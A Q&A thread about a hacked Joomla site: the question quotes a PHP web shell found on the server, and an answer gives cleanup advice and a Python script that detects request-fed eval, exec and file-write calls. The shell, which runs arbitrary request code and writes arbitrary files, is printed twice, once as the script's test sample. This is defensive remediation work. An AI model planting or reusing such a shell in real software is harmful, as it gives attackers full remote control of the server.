1
votes

I have a customer whose Joomla website was hacked. I am not exactly sure how it happened, but I can see that there are many scripts that send out spam email. Upon searching for files that contain the word eval( I found 61 matches, like the following file:

<?php

$lbdw = "495c05e857e328e1e65ca6b0bc03dc88";
if (isset($_REQUEST['tlhqdsj'])) {
    // Executes whatever PHP code arrives in the request parameter.
    $mglvq = $_REQUEST['tlhqdsj'];
    eval($mglvq);
    exit();
}
if (isset($_REQUEST['ofva'])) {
    // Writes request-supplied content ('tbun') to a request-supplied path ('ofva').
    $ulmajcbk = $_REQUEST['tbun'];
    $cdpumv = $_REQUEST['ofva'];
    $tgcjl = fopen($cdpumv, 'w');
    $ogrmbcz = fwrite($tgcjl, $ulmajcbk);
    fclose($tgcjl);
    echo $ogrmbcz;
    exit();
}

?>

I do not want to delete the whole website because I did not develop it. All I need is a security checklist and a way of searching for other known exploits.

What other precautions should I take on the server where this Joomla website is installed?

Any idea how they were able to upload so many files to the server?


2 Answers

2
votes

This is a botnet PHP file, likely spread through an exploit in Joomla (there was one disclosed in mid-August, for example). It allows a remote user to execute arbitrary PHP code and upload files to your server. See the Joomla security page for more information.

My strongest recommendation would be to wipe the entire server -- or at least anything the customer's user had access to -- and start over. You never know what the attacker has uploaded, and you can never be completely sure there aren't more backdoors present.

If that's infeasible, I recommend wiping the Joomla install and reinstalling with a fresh copy of Joomla 2.5.14 or 3.1.5.

If you can't even do that, well, you can try upgrading Joomla in-place, searching for infected PHP files, and deleting them. You're running a strong risk that you'll miss a file and remain vulnerable, though.
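To illustrate the "searching for infected PHP files" step, here is a small triage script added to this answer (it is example code, not part of the original post, of Joomla, or of any scanner the answer refers to). Rather than grepping for eval( alone, it flags dangerous PHP sinks such as eval(), fopen()/fwrite() and exec() whose arguments come, directly or through intermediate variables, from $_REQUEST-style input. The backdoor from the question is embedded as a constructed sample next to a benign snippet. The sink list and the line-based taint tracking are deliberate simplifications (assumptions), so treat every hit as a lead for manual review, and expect obfuscated payloads that decode themselves at runtime to slip past it.

```python
"""Triage PHP files for request-driven backdoors (added example, not Joomla code)."""
import os
import re
import sys

SUPERGLOBALS = r"\$_(?:REQUEST|GET|POST|COOKIE|FILES|SERVER)"
# Code execution, command execution and file-write sinks. Assumption: this is a
# starting list for triage, not an exhaustive catalogue. Longer names come first
# so the regex alternation does not stop at a shorter prefix (include vs include_once).
SINKS = ("eval", "assert", "create_function", "shell_exec", "system", "exec",
         "passthru", "popen", "proc_open", "fopen", "fwrite", "file_put_contents",
         "include_once", "include", "require_once", "require")

# "$var = ..." or "$var .= ..." on one line; "==" is excluded by the lookahead.
ASSIGN_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*\.?=(?!=)\s*(.+?);")
VAR_RE = re.compile(r"\$[A-Za-z_]\w*")
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(?\s*([^;]*)", re.I)

# Constructed sample: the shell posted in the question.
SAMPLE_BACKDOOR = """<?php
$lbdw = "495c05e857e328e1e65ca6b0bc03dc88";
if (isset($_REQUEST['tlhqdsj'])) {
    $mglvq = $_REQUEST['tlhqdsj'];
    eval($mglvq);
    exit();
}
if (isset($_REQUEST['ofva'])) {
    $ulmajcbk = $_REQUEST['tbun'];
    $cdpumv = $_REQUEST['ofva'];
    $tgcjl = fopen($cdpumv, 'w');
    $ogrmbcz = fwrite($tgcjl, $ulmajcbk);
    fclose($tgcjl);
    echo $ogrmbcz;
    exit();
}
?>
"""

# Constructed benign sample: request data is used, but never reaches a sink.
SAMPLE_BENIGN = """<?php
$q = isset($_REQUEST['q']) ? $_REQUEST['q'] : '';
echo htmlspecialchars($q, ENT_QUOTES, 'UTF-8');
"""


def tainted_variables(source):
    """Variables that receive request data, directly or via other tainted variables.

    Only single-line assignments are tracked; multi-line statements are missed.
    """
    tainted = set()
    assignments = [(m.group(1), m.group(2)) for m in ASSIGN_RE.finditer(source)]
    changed = True
    while changed:  # iterate to a fixed point so later uses pick up earlier taint
        changed = False
        for var, rhs in assignments:
            if var in tainted:
                continue
            if re.search(SUPERGLOBALS, rhs) or any(v in tainted for v in VAR_RE.findall(rhs)):
                tainted.add(var)
                changed = True
    return tainted


def scan_source(source):
    """Return (line_no, sink, stripped_line) for each sink call reached by request data."""
    tainted = tainted_variables(source)
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for m in SINK_RE.finditer(line):
            sink, args = m.group(1).lower(), m.group(2)
            if re.search(SUPERGLOBALS, args) or any(v in tainted for v in VAR_RE.findall(args)):
                findings.append((line_no, sink, line.strip()))
    return findings


def scan_tree(root, extensions=(".php", ".phtml", ".php5", ".inc")):
    """Walk a web root and map each suspicious file path to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    findings = scan_source(fh.read())
            except OSError:
                continue
            if findings:
                report[path] = findings
    return report


if __name__ == "__main__":
    if len(sys.argv) > 1:  # e.g. python3 triage.py /var/www/html
        for path, findings in sorted(scan_tree(sys.argv[1]).items()):
            for line_no, sink, snippet in findings:
                print(f"{path}:{line_no}: {sink}() fed by request data: {snippet}")
    else:  # no path given: run against the constructed samples
        for label, src in (("backdoor", SAMPLE_BACKDOOR), ("benign", SAMPLE_BENIGN)):
            print(label, scan_source(src))
```

Run it against the web root and review every reported file by hand; compare the hits against a pristine copy of the same Joomla version and its extensions, since legitimate code also calls include and fwrite. Files with no hits are not proven clean, which is why the wipe-and-reinstall advice above still stands.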